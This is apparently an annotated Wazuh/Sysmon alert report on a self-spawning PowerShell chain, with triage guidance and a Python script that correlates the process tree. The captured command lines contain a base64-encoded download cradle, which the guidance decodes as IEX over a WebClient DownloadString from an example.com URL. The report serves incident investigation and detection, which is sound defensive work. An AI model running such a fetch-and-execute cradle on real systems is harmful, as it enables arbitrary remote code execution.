Time the record was written to the Windows event log (UTC, 100 ns resolution). Compare with data.win.eventdata.utcTime (when Sysmon saw the action) and timestamp (when Wazuh indexed it) to measure collection lag: about 3 s end to end here.

data.win.system.eventRecordID:  350331
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service (3712 on this host), not the process being reported. The reported process is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Not useful for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record was read from. Microsoft-Windows-Sysmon/Operational is the Sysmon log; open it in Event Viewer or with wevtutil when you need the original XML.

data.win.system.computer:  Attacker
Hostname Windows wrote into the event. Should equal agent.name (it does: Attacker); a mismatch means a forwarded log or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:39.967 ProcessGuid: {94294ddc-c165-680a-d60c-000000000e00} ProcessId: 7424 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2tf3tc0d.fi2.ps1 CreationUtcTime: 2025-04-24 22:55:39.967 User: Attacker\Attcker1"
Rendered event text with all Sysmon fields in one string; same content as the data.win.eventdata.* fields below. The file name ending in __PSScriptPolicyTest_*.ps1 is the detail that decides this alert.

data.win.eventdata.utcTime:  2025-04-24 22:55:39.967
Sysmon's timestamp for the file write (UTC, ms). About six seconds after the process start in the previous Event ID 1 alert, and about three seconds before Wazuh indexed it.

data.win.eventdata.processGuid:  {94294ddc-c165-680a-d60c-000000000e00}
Sysmon's globally unique ID of the writing process. Same GUID as the Event ID 1 alert above ({94294ddc-c165-680a-d60c-000000000e00}, PID 7424), so this file write belongs to that PowerShell instance.

data.win.eventdata.processId:  7424
PID of the writing process. 7424 matches the PowerShell from the previous alert, but rely on processGuid for the link since PIDs get reused.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that wrote the file: powershell.exe itself. Combined with the file name below, this is PowerShell's own start-up behaviour, not a download.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2tf3tc0d.fi2.ps1
Path of the created file. __PSScriptPolicyTest_<random>.<random>.ps1 in the user's Temp folder is written by powershell.exe at engine start to test whether AppLocker/WDAC script enforcement applies. It is a side effect of the PowerShell launch, not a dropped tool, so the T1105 label over-states this single event.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:39.967
Creation time Sysmon saw on the file. Equal to utcTime, so a brand-new file; an older value would mean an existing file was overwritten or its timestamp tampered with.

data.win.eventdata.user:  Attacker\\Attcker1
Account whose process wrote the file. Same Attcker1 session as the process chain.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:44.760+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell. Decode the -EncodedCommand value first (base64 over UTF-16LE text); here it is a one-line download cradle, IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). Then follow parentProcessGuid upward until the parent is no longer powershell.exe to find what started the chain, and check proxy and DNS logs for example.com.

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:44.760+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  117
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535344.2708404
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means eventID below uses Sysmon's numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider. {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's fixed provider GUID, so it filters reliably even if the name is localized or missing.

data.win.system.eventID:  1
Event ID within the provider. For Sysmon this is the event type, not a Security-log ID: 1 = Process Create, 3 = Network Connect, 7 = Image Load, 10 = Process Access, 11 = File Create, 13 = Registry Value Set. 1 here, so image, commandLine and the parent* fields carry the evidence.

data.win.system.version:  5
Schema version of this event type. Sysmon bumps it when it adds fields to an event, so an old decoder can silently drop the newer fields.

data.win.system.level:  4
Numeric event level: 4 = Informational, 3 = Warning, 2 = Error. Sysmon logs nearly everything at 4, so rank by rule.level instead.

data.win.system.task:  1
Task category. Sysmon sets it equal to the event ID, so for Sysmon events it adds nothing.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:42.7324746Z
Time the record was written to the Windows event log (UTC, 100 ns resolution). Compare with data.win.eventdata.utcTime (when Sysmon saw the action) and timestamp (when Wazuh indexed it): about 3 s of collection lag here.

data.win.system.eventRecordID:  350363
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service (3712 on this host), not the process being reported. The reported process is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Not useful for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record was read from. Microsoft-Windows-Sysmon/Operational is the Sysmon log; open it in Event Viewer or with wevtutil when you need the original XML.

data.win.system.computer:  Attacker
Hostname Windows wrote into the event. Should equal agent.name (it does: Attacker); a mismatch means a forwarded log or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:41.633 ProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00} ProcessId: 9948 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c165-680a-d60c-000000000e00} ParentProcessId: 7424 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Rendered event text with every Sysmon field in one string. Same data as the data.win.eventdata.* fields below, just un-parsed; search it when a field failed to decode.

data.win.eventdata.utcTime:  2025-04-24 22:55:41.633
Sysmon's own timestamp for the process start (UTC, ms): about eight seconds after its parent 7424 started. Order endpoint events by this; the top-level timestamp is only when Wazuh indexed the alert.

data.win.eventdata.processGuid:  {94294ddc-c16d-680a-df0c-000000000e00}
Sysmon's globally unique ID for this process. Never reused, unlike a PID, so pivot on it to link this Event ID 1 to the File Create (11), Network Connect (3) and Process Access (10) events the same process produces later.

data.win.eventdata.processId:  9948
Windows PID (9948). Reused once the process exits, so it only identifies a process together with utcTime or processGuid.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that started. Again the real powershell.exe under System32; the interest is in how it was launched, not what it is.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version string from the binary's PE resource. Same build as the earlier Event ID 1, consistent with one and the same powershell.exe on disk.

data.win.eventdata.description:  Windows PowerShell
Description from the PE version resource. Trivial to forge in a custom binary, so treat it as a hint, not proof.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the PE version resource. Informational only; same forgery caveat as description.

data.win.eventdata.company:  Microsoft Corporation
Company from the PE version resource. A fake can say Microsoft Corporation just as easily; trust the hash, not this string.

data.win.eventdata.originalFileName:  PowerShell.EXE
File name compiled into the PE. Compare with image: PowerShell.EXE running from a file called anything else is the classic renamed-binary evasion.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line Sysmon captured (Wazuh escapes the quotes and backslashes). Identical to the command line of the earlier Event ID 1: the same UTF-16LE base64 payload, decoding to the same IEX download of https://example.com/test. Same cradle, next generation.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process. The user's profile root fits a shell launched in an interactive session; services normally start in System32.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as, written COMPUTER\user or DOMAIN\user. Attacker\Attcker1 is a local account on the host called Attacker.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon's GUID for the logon session the process belongs to. Identical to the earlier Event ID 1, so one session spawned the whole chain.

data.win.eventdata.logonId:  0x26584
Logon session LUID in hex. It is the Logon ID in Security event 4624, so search 0x26584 there to find how and when Attcker1 logged on (console, RDP, network).

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 is services; 1 is the first interactive session (console or RDP). 1 here means a logged-in user session, not a service.

data.win.eventdata.integrityLevel:  Medium
Process integrity level: Low, Medium (normal user), High (elevated admin), System. Still Medium, so no elevation has happened in this generation either.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file in the algorithms Sysmon is configured for (SHA256 here). Identical to the hash in the earlier Event ID 1, so the same binary; verify it once against a known-good powershell.exe of this build.

data.win.eventdata.parentProcessGuid:  {94294ddc-c165-680a-d60c-000000000e00}
processGuid of the parent. {94294ddc-c165-680a-d60c-000000000e00} is the processGuid of the PowerShell in the first Event ID 1 alert, so this process is its child; search the value as processGuid to walk the tree.

data.win.eventdata.parentProcessId:  7424
Parent's PID. 7424 is the process from the earlier Event ID 1 alert, so this is a child of a child; the chain is at least three generations deep counting 5124.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Parent's executable. powershell.exe spawning powershell.exe is what rule 92057 keys on; a legitimate admin rarely does it with an encoded command.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
The parent's full command line. Byte for byte the same as commandLine above, so each generation re-runs exactly the cradle its parent ran, which points to the downloaded script re-launching the same command.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent ran as. Same as the child here; a different user between parent and child would mean a privilege or session boundary was crossed.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:44.776+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer. Same pattern as the T1105 alert before it: the file is PowerShell's own __PSScriptPolicyTest_*.ps1 policy probe, written by process 9948 on start-up. Treat it as a breadcrumb of the PowerShell chain, not as a downloaded tool; the Event ID 1 alerts carry the real evidence.

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:44.776+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  121
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535344.2716467
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means eventID below uses Sysmon's numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider. {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's fixed provider GUID, so it filters reliably even if the name is localized or missing.

data.win.system.eventID:  11
Event ID within the provider. For Sysmon this is the event type, not a Security-log ID: 1 = Process Create, 3 = Network Connect, 7 = Image Load, 10 = Process Access, 11 = File Create, 13 = Registry Value Set. 11 here, so targetFilename is the field that matters.

data.win.system.version:  2
Schema version of this event type. Sysmon bumps it when it adds fields to an event, so an old decoder can silently drop the newer fields.

data.win.system.level:  4
Numeric event level: 4 = Informational, 3 = Warning, 2 = Error. Sysmon logs nearly everything at 4, so rank by rule.level instead.

data.win.system.task:  11
Task category. Sysmon sets it equal to the event ID, so for Sysmon events it adds nothing.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:42.9929079Z
Time the record was written to the Windows event log (UTC, 100 ns resolution). Compare with data.win.eventdata.utcTime (when Sysmon saw the action) and timestamp (when Wazuh indexed it): under 2 s of collection lag here.

data.win.system.eventRecordID:  350364
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service (3712 on this host), not the process being reported. The reported process is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Not useful for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record was read from. Microsoft-Windows-Sysmon/Operational is the Sysmon log; open it in Event Viewer or with wevtutil when you need the original XML.

data.win.system.computer:  Attacker
Hostname Windows wrote into the event. Should equal agent.name (it does: Attacker); a mismatch means a forwarded log or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:42.952 ProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00} ProcessId: 9948 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gaycvjfa.rkm.ps1 CreationUtcTime: 2025-04-24 22:55:42.952 User: Attacker\Attcker1"
Rendered event text with all Sysmon fields in one string; same content as the data.win.eventdata.* fields below. Again a __PSScriptPolicyTest_*.ps1 file name, this time from process 9948.

data.win.eventdata.utcTime:  2025-04-24 22:55:42.952
Sysmon's timestamp for the file write (UTC, ms). About 1.3 s after process 9948 started in the previous Event ID 1 alert, which is the timing you expect from PowerShell's start-up policy probe.

data.win.eventdata.processGuid:  {94294ddc-c16d-680a-df0c-000000000e00}
Sysmon's globally unique ID of the writing process. Same GUID as the previous Event ID 1 alert ({94294ddc-c16d-680a-df0c-000000000e00}, PID 9948), so this file write belongs to that PowerShell instance.

data.win.eventdata.processId:  9948
PID of the writing process. 9948 matches the PowerShell from the previous alert, but rely on processGuid for the link since PIDs get reused.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that wrote the file: powershell.exe itself. Combined with the file name below, this is PowerShell's own start-up behaviour, not a download.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gaycvjfa.rkm.ps1
Path of the created file. __PSScriptPolicyTest_<random>.<random>.ps1 in the user's Temp folder is written by powershell.exe at engine start to test whether AppLocker/WDAC script enforcement applies. One such file per PowerShell launch is normal; it is not a dropped tool.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:42.952
Creation time Sysmon saw on the file. Equal to utcTime, so a brand-new file; an older value would mean an existing file was overwritten or its timestamp tampered with.

data.win.eventdata.user:  Attacker\\Attcker1
Account whose process wrote the file. Same Attcker1 session as the process chain.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
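The two Event ID 11 alerts and the Event ID 1 alerts in this report describe one process tree, not five separate incidents. What follows is an added example, not part of the SOCscribe report or of Wazuh, showing how to correlate them: it indexes Event ID 1 by processGuid, walks parentProcessGuid up to the earliest known ancestor, flags the self-replicating command line, and separates PowerShell's own __PSScriptPolicyTest_*.ps1 policy-probe writes from any other file creation. The ALERTS list is constructed from the five Sysmon alerts as printed (GUIDs, PIDs, times, paths; the Event ID 1 for PID 9224 is the alert that follows this one); all function names are hypothetical. The probe check trusts the file name only when powershell.exe or pwsh.exe is the writer, so a binary masquerading with that name is not waved through.

```python
import re
from collections import defaultdict

# Constructed sample: the five Sysmon alerts on this page (three Event ID 1, two
# Event ID 11), trimmed to the fields the correlation needs. GUIDs, PIDs, times,
# paths and the encoded command are copied from the alerts as printed.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC = ("SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwA"
       "aQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQA"
       "dABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA")
CMD = f'"{PS}" "{PS}" -NoLogo -NoProfile -EncodedCommand {ENC}'
TMP = r"C:\Users\Attcker1\AppData\Local\Temp"
G161 = "{94294ddc-c161-680a-d10c-000000000e00}"  # parent of 7424; no Event ID 1 on the page
G165 = "{94294ddc-c165-680a-d60c-000000000e00}"  # PID 7424
G16D = "{94294ddc-c16d-680a-df0c-000000000e00}"  # PID 9948
G170 = "{94294ddc-c170-680a-e10c-000000000e00}"  # PID 9224


def _create(t, guid, pid, pguid, ppid):
    return {"eventID": 1, "utcTime": t, "processGuid": guid, "processId": pid,
            "image": PS, "commandLine": CMD, "parentProcessGuid": pguid,
            "parentProcessId": ppid, "parentImage": PS, "parentCommandLine": CMD}


def _file(t, guid, pid, name):
    return {"eventID": 11, "utcTime": t, "processGuid": guid, "processId": pid,
            "image": PS, "targetFilename": TMP + "\\" + name}


ALERTS = [
    _create("2025-04-24 22:55:33.660", G165, 7424, G161, 5124),
    _file("2025-04-24 22:55:39.967", G165, 7424, "__PSScriptPolicyTest_2tf3tc0d.fi2.ps1"),
    _create("2025-04-24 22:55:41.633", G16D, 9948, G165, 7424),
    _file("2025-04-24 22:55:42.952", G16D, 9948, "__PSScriptPolicyTest_gaycvjfa.rkm.ps1"),
    _create("2025-04-24 22:55:44.004", G170, 9224, G16D, 9948),
]

# PowerShell writes this file to %TEMP% at engine start to probe AppLocker/WDAC
# script enforcement. Benign only when PowerShell itself is the writer.
POLICY_PROBE = re.compile(r"\\__PSScriptPolicyTest_[A-Za-z0-9]+\.[A-Za-z0-9]+\.ps1$",
                          re.IGNORECASE)


def is_powershell_policy_probe(alert):
    """True for an Event ID 11 that is PowerShell's own start-up probe file."""
    if alert["eventID"] != 11:
        return False
    exe = alert["image"].rsplit("\\", 1)[-1].lower()
    return exe in ("powershell.exe", "pwsh.exe") and \
        POLICY_PROBE.search(alert["targetFilename"]) is not None


def build_tree(alerts):
    """Index Event ID 1 by processGuid; group Event ID 11 by the writing process."""
    procs = {a["processGuid"]: a for a in alerts if a["eventID"] == 1}
    files = defaultdict(list)
    for a in alerts:
        if a["eventID"] == 11:
            files[a["processGuid"]].append(a)
    return procs, files


def ancestry(procs, guid):
    """Walk parentProcessGuid upward. The last GUID returned has no Event ID 1 in
    the data (started before Sysmon, or outside the window you pulled)."""
    chain = [guid]
    while guid in procs:
        guid = procs[guid]["parentProcessGuid"]
        chain.append(guid)
    return chain


def triage(alerts):
    procs, files = build_tree(alerts)
    pid_of = {g: a["processId"] for g, a in procs.items()}
    pid_of.update({a["parentProcessGuid"]: a["parentProcessId"] for a in procs.values()})
    parents = {a["parentProcessGuid"] for a in procs.values()}
    leaves = [g for g in procs if g not in parents]
    chain = max((ancestry(procs, g) for g in leaves), key=len, default=[])
    probes = [f for fs in files.values() for f in fs if is_powershell_policy_probe(f)]
    n_files = sum(len(fs) for fs in files.values())
    return {
        "chain_pids": [pid_of[g] for g in chain],               # leaf first, root last
        "unseen_root": chain[-1] if chain and chain[-1] not in procs else None,
        # every generation re-launches the identical encoded cradle
        "self_replicating": bool(procs) and all(
            a["commandLine"] == a["parentCommandLine"] for a in procs.values()),
        "policy_probe_files": len(probes),
        "other_files": n_files - len(probes),
    }


if __name__ == "__main__":
    print(triage(ALERTS))
```

On this data the result is a four-deep chain 9224 → 9948 → 7424 → 5124 with the same command line at every hop, both file writes accounted for by PowerShell's policy probe, and 5124 as the first ancestor without an Event ID 1 in the report: that record, pulled from the Sysmon log by processGuid, is where the investigation should go next.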

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:47.435+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell. Third link of one chain (9224, parent 9948, grandparent 7424), every generation carrying the identical encoded download cradle. One process tree, one root cause: contain the earliest ancestor and block or sinkhole the download URL rather than triaging each link on its own.

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:47.435+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  118
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535347.2719232
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means eventID below uses Sysmon's numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider. {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's fixed provider GUID, so it filters reliably even if the name is localized or missing.

data.win.system.eventID:  1
Event ID within the provider. For Sysmon this is the event type, not a Security-log ID: 1 = Process Create, 3 = Network Connect, 7 = Image Load, 10 = Process Access, 11 = File Create, 13 = Registry Value Set. 1 here, so image, commandLine and the parent* fields carry the evidence.

data.win.system.version:  5
Schema version of this event type. Sysmon bumps it when it adds fields to an event, so an old decoder can silently drop the newer fields.

data.win.system.level:  4
Numeric event level: 4 = Informational, 3 = Warning, 2 = Error. Sysmon logs nearly everything at 4, so rank by rule.level instead.

data.win.system.task:  1
Task category. Sysmon sets it equal to the event ID, so for Sysmon events it adds nothing.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:45.1744811Z
Time the record was written to the Windows event log (UTC, 100 ns resolution). Compare with data.win.eventdata.utcTime (when Sysmon saw the action) and timestamp (when Wazuh indexed it): about 3.5 s of collection lag here.

data.win.system.eventRecordID:  350392
Incremental log record number – handy for timeline order.

